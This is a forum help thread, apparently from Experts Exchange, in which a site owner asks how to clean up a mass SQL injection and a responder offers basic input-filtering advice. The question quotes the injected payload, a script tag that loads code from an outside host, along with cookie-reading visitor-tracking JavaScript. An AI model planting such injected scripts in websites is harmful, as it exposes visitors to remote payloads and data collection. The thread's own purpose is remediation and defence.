norway77
asked on
sql injection attack
I got hit last night with a sql injection that loaded a script into a lot of my fields in mulitple tables.
1I wanted to find out if anyone knows what this script did and how i can get rid of it,
2) and if there are any good sql injection tools that i can use to find the vulnerable areas.
3)The attack added this to the end of a bunch of fields in my database. How do i go about doing a replace for all fields in a table or the entire database so that it won't take forever to remove them.
here is the script that was added.
really need help on this
thanks in advance
danny
1I wanted to find out if anyone knows what this script did and how i can get rid of it,
2) and if there are any good sql injection tools that i can use to find the vulnerable areas.
3)The attack added this to the end of a bunch of fields in my database. How do i go about doing a replace for all fields in a table or the entire database so that it won't take forever to remove them.
here is the script that was added.
really need help on this
thanks in advance
danny
<script src=http://mokanfu.cn></script>
and here is what the function on the site looks like
function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} function y_g(name) {var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(iyesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}} var yesdata; yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent); document.write(''); var seraph; if (seraph==null) { seraph=1; document.write(""); }
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Just realised its closed after I wrote an answer. Might as well add my 2c...
I don't think this is sql injection but form injection.
Were the field in the database related to fields you populate when visitors fill in web forms?
If this is the case here are a few suggestions for protection:
I don't think this is sql injection but form injection.
Were the field in the database related to fields you populate when visitors fill in web forms?
If this is the case here are a few suggestions for protection:
- Before letting visitors submit, verify its a real person via logon, captcha, question or other sorts of system that block bots and spammers.
- Don't allow tags in the data. Develop a function to strip undesirable content.
ASKER